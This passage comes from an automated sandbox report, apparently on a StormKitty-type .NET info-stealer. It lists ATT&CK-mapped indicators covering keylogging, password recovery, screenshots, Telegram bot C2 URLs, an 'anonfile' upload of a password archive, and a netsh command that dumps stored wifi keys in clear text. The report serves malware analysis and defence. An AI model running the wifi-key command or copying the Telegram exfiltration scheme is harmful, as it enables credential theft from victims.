\"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-217", "type": 2, "relevance": 1, "name": "Contains ability to retrieve user privileges (API string)", "description": "Found reference to API \"IsInRole\" (Indicator: \"IsInRole\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"IsInRole\" (Indicator: \"IsInRole\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetKeyboardState\" (Indicator: \"GetKeyboardState\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"MapVirtualKey\" (Indicator: \"MapVirtualKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetKeyboardState\" (Indicator: \"GetKeyboardState\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"MapVirtualKey\" (Indicator: \"MapVirtualKey\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"passwordVaultPtr\" (Indicator: \"password\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Running passwords recovery...\" (Indicator: \"password\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"password\" (Indicator: \"password\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Remember password:\" (Indicator: \"password\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"\\nRemember password:\" (Indicator: \"password\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \")\\n🔐 *Archive password is*: \\\"_\" (Indicator: \"password\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"), Found string \"Sending passwords archive to anonfile\" (Indicator: \"password\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"), Found string \"er password:\" (Indicator: \"password\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"unning passwords recovery...\" (Indicator: \"password\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"Remember password:\" (Indicator: \"password\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"*Archive password is*: \"_\" (Indicator: \"password\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ending passwords archive to anonfile\" (Indicator: \"password\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"passwordVaultPtr\" (Indicator: \"password\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \",3024,,RtlGetVersion,NTDLL.d\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-334", "type": 2, "relevance": 1, "name": "Contains ability to search for patterns of text (possibly credentials) in files", "description": "Found string \"/C chcp 65001 && netsh wlan show profile | findstr All\" (Indicator: \"findstr \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"\\\" key=clear | findstr Key\" (Indicator: \"findstr \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"), Found string \"netsh wlan show profile | findstr All\" (Indicator: \"findstr \"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"ar | findstr Key\" (Indicator: \"findstr \"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"C chcp 65001 && netsh wlan show profile | findstr All\" (Indicator: \"findstr \"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"key=clear | findstr Key\" (Indicator: \"findstr \"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"[CTRL]\" (Indicator: \"[ctrl]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[CTRL]\" (Indicator: \"[Ctrl]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[CAPSLOCK: OFF]\" (Indicator: \"[CAPSLOCK: OFF]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[CAPSLOCK: ON]\" (Indicator: \"[CAPSLOCK: ON]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[ESC]\" (Indicator: \"[esc]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[Shift]\" (Indicator: \"[shift]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[Back]\" (Indicator: \"[Back]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[Tab]\" (Indicator: \"[tab]\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-328", "type": 2, "relevance": 1, "name": "Contains ability to retrieve list of files and subdirectories", "description": "Found string \"dir /S /Q \"\" (Indicator: \"dir \"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00006044.00000000.66236.0026B000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-113", "relevance": 1, "name": "Contains ability to capture screenshot", "description": "Observed function \"System.Drawing.CopyFromScreen\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-100", "relevance": 1, "name": "Contains ability to gather process details (Dotnet)", "description": "Observed function \"get_ProcessName\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"GetProcessesByName\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"GetProcessById\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "stream-136", "type": 1, "relevance": 5, "name": "Contains ability to retrieve user privileges", "description": "System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) at 74d47b52ea65535614a0d1c0e6076ff9-6000114-Program~IsAdministrator\n System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) at 74d47b52ea65535614a0d1c0e6076ff9-6000326-Methods~IsAdmin", "origin": "Hybrid Analysis Technology", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"github.com/limerboy/stormkitty\"\n Heuristic match: \"google.com\"\n Heuristic match: \"api.telegram.org\"\n Heuristic match: \"[+] connected to api.telegram.org\"\n Heuristic match: \"[!] retrying connect to api.telegram.org\"\n Pattern match: \"t.me/%2bvuyf7s1mzfa0nwq6\"\n Pattern match: \"https://api.telegram.org/bot\"\n Pattern match: \"https://api.telegram.org/bot{0}/getupdates?offset={1\"\n Pattern match: \"https://api.telegram.org/file/bot\"\n Pattern match: \"https://raw.githubusercontent.com/limerboy/stormkitty/master/stormkitty/stub/packages/dotnetzip.1.13.8/lib/net40/dotnetzip.dll\"\n Heuristic match: \"connected to api.telegram.org\"\n Heuristic match: \"telegram.org\"\n Pattern match: \"api.telegram.org/bot{0}/getupdates?offset={1\"\n Pattern match: \"ram.org/file/bot\"\n Pattern match: \"microsoft.net/framework/v4.0.30319/\"\n Pattern match: \"microsoft.net/assembly/gac_32/mscorlib/v4.0_4.0.0.0__b77a5c561934e089/mscorlib.dll\"\n Heuristic match: \"oft.net\"\n Pattern match: \"oft.net/assembly/gac_32/mh\"\n Heuristic match: \"pathext=.co\"\n Heuristic match: \"cim_system.name\"\n Heuristic match: \"oogle.com\"\n Heuristic match: \"pi.telegram.org\"\n Heuristic match: \"+] connected to api.telegram.org\"\n Heuristic match: \"!] retrying connect to api.telegram.org\"\n Pattern match: \"api.telegram.org/bot\"\n Pattern match: \"api.telegram.org/file/bot\"\n Pattern match: \"raw.githubusercontent.com/limerboy/stormkitty/master/stormkitty/stub/packages/dotnetzip.1.13.8/lib/net40/dotnetzip.dll\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-186", "type": 2, "relevance": 1, "name": "Found domain strings related to cloud services(possible C&C communication)", "description": "Found string \"api.telegram.org\" (Indicator: \"api.telegram.org\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[+] Connected to api.telegram.org\" (Indicator: \"api.telegram.org\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"[!] Retrying connect to api.telegram.org\" (Indicator: \"api.telegram.org\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"https://api.telegram.org/bot\" (Indicator: \"api.telegram.org\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"https://api.telegram.org/bot{0}/getUpdates?offset={1}\" (Indicator: \"api.telegram.org\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"https://api.telegram.org/file/bot\" (Indicator: \"api.telegram.org\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll\" (Indicator: \"githubusercontent.com\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Connected to api.telegram.org\" (Indicator: \"api.telegram.org\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"//api.telegram.org/bot{0}/getUpdates?offset={1}\" (Indicator: \"api.telegram.org\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"+] Connected to api.telegram.org\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"!] Retrying connect to api.telegram.org\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ttps://api.telegram.org/bot\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ttps://api.telegram.org/bot{0}/getUpdates?offset={1}\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ttps://api.telegram.org/file/bot\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ttps://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll\" (Indicator: \"githubusercontent.com\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-98", "type": 2, "relevance": 1, "name": "Possibly tries to communicate over SSL connection (HTTPS)", "description": "Found HTTPS url \"https://github.com\"\n Found HTTPS url \"https://api.telegram.org\"\n Found HTTPS url \"https://raw.githubusercontent.com\"", "origin": "File/Memory", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"=<IPv4>, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" requirePermission=\"false\" allowDefinition=\"MachineToApplication\" />\", Potential IP \"<IPv4>\" found in string \"n=<IPv4>\n C\", Potential IP \"<IPv4>\" found in string \"ion=<IPv4>\n Culture=neutral\n PublicKeyToken=b77a5c561934e089\" />\"\n Potential IP \"<IPv4>\" found in string \"rsion=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" />\", Potential IP \"<IPv4>\" found in string \"<IPv4>\n Culture=neutral\n PublicKeyToken=31bf3856ad364e35\" requirePermission=\"false\" allowDefinition=\"MachineToApplication\" />\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>, Cul\"\n \"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"https://github.com/limerboy/stormkitty>>%l\" - Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: db95a4cb23548a635a1dfebcee9991cb", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-110", "relevance": 1, "name": "Contains ability to provide interface for network protocols (Dotnet)", "description": "Observed namespace \"System.Net.NetworkInformation\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Net\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Net.Http\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-158", "relevance": 1, "name": "Contains ability to communicate with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \".ctor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadString\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"set_UseDefaultCredentials\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadFile\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"get_Headers\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"UploadFile\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"set_Credentials\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-142", "relevance": 1, "name": "Contains ability to upload data with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \"UploadFile\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-159", "relevance": 1, "name": "Contains ability to communicate via sockets (Dotnet)", "description": "Observed Namespace \"System.Net.Sockets.NetworkStream\" and MemberReference \".ctor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-438", "type": 2, "relevance": 3, "name": "Contains ability to perform AES/RC4 encryption (API string)", "description": "Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptEncrypt\" (Indicator: \"BCryptEncrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptEncrypt\" (Indicator: \"CryptEncrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptImportKey\" (Indicator: \"CryptImportKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptDestroyKey\" (Indicator: \"BCryptDestroyKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptDestroyKey\" (Indicator: \"CryptDestroyKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptGetProperty\" (Indicator: \"BCryptGetProperty\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptSetProperty\" (Indicator: \"BCryptSetProperty\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptGetProperty() (get size) failed with status code:{0}\" (Indicator: \"BCryptGetProperty\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptGetProperty() failed with status code:{0}\" (Indicator: \"BCryptGetProperty\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptImportKey() failed with status code:{0}\" (Indicator: \"CryptImportKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-357", "type": 2, "relevance": 1, "name": "Contains ability to decrypt data using RSA (Dotnet String)", "description": "Observed string: 